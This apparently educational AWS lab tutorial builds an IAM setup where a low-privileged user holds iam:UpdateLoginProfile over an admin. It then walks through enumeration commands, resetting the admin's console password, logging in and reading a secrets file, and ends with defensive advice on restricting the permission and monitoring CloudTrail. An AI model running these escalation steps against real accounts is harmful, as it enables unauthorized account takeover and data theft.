AWS: IAM UpdateLoginProfile Abuse
Identity and Access Management (IAM) is the foundation of security in every cloud platform. Misconfigurations or over-privileged identities are among the most common causes of cloud breaches, making IAM a prime target for both attackers and defenders.
This hands-on lab demonstrates how a mis-scoped UpdateLoginProfile permission enables console takeover and privilege escalation by resetting a specified IAM user’s console password to gain account access.
Table Of Contents
About IAM UpdateLoginProfile
Lab Setup and Prerequisite
Part 1: IAM Lab Setup
- Provisioning a Low-Privileged IAM User
- Provisioning a High-Privileged IAM User
- provisioning a User Group with UpdateLoginProfile policy
Part 2: Enumeration and Exploitation
- Enumerating profile with Python script
- Set up & Enumeration of profile using AWS CLI
- IAM UpdateLoginProfile Exploitation
Analysis
Recommendations
Conclusion
About IAM: UpdateLoginProfile
UpdateLoginProfile in AWS changes the password for the specified IAM user. You can use the AWS CLI, the AWS API, or the Users page in the IAM console to change the password for any IAM user.
Lab Setup and Prerequisites:
- An AWS Account
- VM Kali Linux
If you are new to AWS platform, it is recommended to go through the AWS Lab setup here.
Part 1: IAM Lab Setup
Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI).
Users:
igt_sanjeet : Low privileged user with risky permissions attached
igt_admin : High privileged user with admin access
Policy name:
update-login-policy
Provisioning a Low-Privileged IAM User
Navigate to IAM > Users, then click Create userto set up a new IAM identity.
Create the user a User name(e.g. igt_sanjeet) and press Next to set permission.
Set permission to configure igt_sanjeet user’s permissions as Add user to groupfrom the Permissions options, press Next
Create user as show
Click on the user name i.e. igt_sanjeet
Create access key for the user.
Select “Command Line Interface (CLI)”as the use case.
Check the box as shown and proceed.
Click Create access key
Now download the .csv filecontaining the Access Key ID and Secret Access Key. Keep these credentials secure.
Provisioning a High-Privileged IAM User
Then, create a powerful IAM user. This user embodies the elevated permissions and igt_sanjeet (low-privileged user) will reset igt_admin password, sign in as that user, and then pivot to more privileged actions.
Navigate to IAM > Users, then click Create userto set up a new IAM identity
Give details as igt_admin as user name, click Next
On Set permissions, select option Attach policies directly. On Permissions policies, search and select “AdministratorAccess”. This policy grants comprehensive control over virtually all AWS services and resources, making it our “high-privileged” target for the lab.
Click Next
Create user igt_admin
Now click on the user igt_admin as as shown
Select the Enable console access
Select the option Autogenerated password and click Enable console access
Provisioning a User Group with UpdateLoginProfile policy
Go to IAM > User groups > Create group.
Add details like the group name as update-login-profile
Create the group
After creating the group, select its name
Click Add permissions → Create inline policy to define and attach a custom policy directly to the group update-login-profile
Specify permissions on the Policy Editor in JSON. Write an inline policy which created for a single IAM identity (user, group, or role) and later it will be used as an escalation path.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:UpdateLoginProfile",
"iam:ListAccessKeys",
"iam:ListAttachedUserPolicies"
],
"Resource": "arn:aws:iam::904557616514:user/Igt_admin"
},
{
"Effect": "Allow",
"Action": [
"iam:ListGroupPolicies",
"iam:ListPolicies",
"iam:ListPolicyVersions",
"iam:ListUserPolicies",
"iam:ListUsers",
"iam:ListGroups",
"iam:ListGroupsForUser",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:GetUser",
"iam:GetUserPolicy",
"iam:GetGroupPolicy"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"s3:ListBucket"
],
"Resource": "arn:aws:s3:::igt-bucket"
},
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "arn:aws:s3:::igt-bucket/*"
},
{
"Effect": "Allow",
"Action": [
"s3:ListAllMyBuckets",
"s3:GetBucketLocation"
],
"Resource": "*"
}
]
}
This is how the policy appears on Policy editor
Click next
Give policy details such as its name update-login-policy and click create policy
The policy is created.
Now, select the group name update-login-profile on users groups and click the Add users
Select user igt_sanjeet and then he became the part of the group update-login-profile
Part 2: Enumeration and Exploitation
Use Case Scenario for UpdateLoginProfile
In real world scenarios, it’s for onboarding, but in a security lab it’s to demonstrate how misconfigured permissions can lead to privilege escalation.
NOTE:
There are two sides of the same thing, an IAM user’s console password (“login profile”).
CreateLoginProfile → sets the first console password for a user who doesn’t have one yet. If a login profile already exists, this call fails with “already exists”.
UpdateLoginProfile → changes the existing console password. If no login profile exists yet, this call fails with “no such entity.” AWS Documents
Enumerating profile with Python script
python enumerate-iam.py --access-key AKI*********** --secret-key ISN*************
This Python enumeration confirmed that the low-privileged user igt_sanjeet can list IAM users, groups, buckets and policies, providing the necessary visibility to identify and escalate into higher-privileged accounts.
Set up & Enumeration of profile using AWS CLI
Now set up the AWS CLI with the IAM user’s credentials, to directly interact with the AWS environment from Kali machine.
Set up a profile named igt_sanjeet in AWS CLI.
aws configure --profile igt_sanjeet
Assigning the access key ID, secret access key, and default region for that profile.
The following command will retrieve the identity information (UserId, Account ID, ARN) for the currently authenticated user via that profile.
aws sts get-caller-identity --profile igt_sanjeet
Lists all IAM groups in the account that the Igt_sanjeet profile has permission to see.
It does not filter to only groups that igt_sanjeet belongs to, it returns every group in the account (unless blocked by permissions).
aws iam list-groups —profile igt_sanjeet
This command will list the names of inline policies attached to the IAM group update-loginprofile-group. Pay attention to the output enclosed in red box.
aws iam list-group-policies --group-name update-login-profile --profile igt_sanjeet
Now,this command will retrieve and display the full JSON document of the inline policy named update-login-policy that is attached to the group update-login-profile.
instead of just showing the policy name (like list-group-policies), it reveals the actual permissions (Effect, Action, Resource) that the policy grants.
aws iam get-group-policy --group-name update-login-profile --policy-name update-login-policy --profile igt_sanjeet
Running this command will list all IAM users in the AWS account that the credentials for the Igt_sanjeet profile have permission to see.
aws iam list-users --profile igt_sanjeet
With these two commands, try to list bucket and its contents
aws s3 ls --profile igt_sanjeet
aws s3 ls s3: // igt-bucket --profile Igt_sanjeet
Now, try to download the object with the following command and it will be denied.
aws s3 cp s3://igt-bucket/secrets.txt --profile igt_sanjeet
Same decline action will be observed when try to remove/delete the object with the following
aws s3 rm s3://igt-bucket/secrets.txt --profile igt_sanjeet
These actions will be denied as the profile igt_sanjeet is not authorized to perform these actions.
This command updates a console login profile (username + password) for the IAM user igt_admin.
NOTE: Since igt_admin has the AdministratorAccess policy, whoever controls this password can log in to the AWS Console as a full admin, which in a misconfigured environment = privilege escalation to admin.
aws iam update-login-profile --user-name igt_admin --password 'YourStrongP@ssw0rd!' –no-password-reset-required --profile igt_sanjeet
IAM updateLoginProfile Exploitation
Use the AWS Console login page with your account ID, enter IAM username igt_admin, the password you update with update-login-profile, and click Sign in.
After login, check the console banner, it should show igt_admin with full access. Now,the user has administrator privileges through privilege escalation. Click your bucket name (igt-bucket) and here in objects you can see a text file secrets.txt, Download the file
On AWS CLI, use this command to display the contents of this file and it’s a success this time.
cat /home/kali/Downloads/secrets.txt
Analysis
This hands-on lab walks through a controlled, authorized scenario showing how an attacker with iam:UpdateLoginProfile rights can gain console access to a target account.
Important: only run these steps in accounts/environments you are explicitly authorized to test. Misuse against real customers or without permission is illegal.
Recommendations
- Deny/limit CreateLoginProfile/UpdateLoginProfile except for a small set of admin/service principals.
- Enforce MFA and permission boundaries on privileged users.
- Use automation/secret-management to provision console access rather than manual password resets.
- Monitor CloudTrail and alert on create/update login events and subsequent console logins.
Conclusion
This lab demonstrated how a seemingly low-privileged IAM user with the iam:UpdateLoginProfile permission can reset another user’s console password and gain unauthorized console access. The exercise highlights the critical need to restrict CreateLoginProfile and UpdateLoginProfile to administrators only, and continuously monitor CloudTrail for such high-impact IAM actions.
Author: Fatima Aziz is an accomplished cybersecurity professional with expertise in cloud security, holding certifications like GPCS and CCSK. Contact Fatima Aziz on LinkedIn.
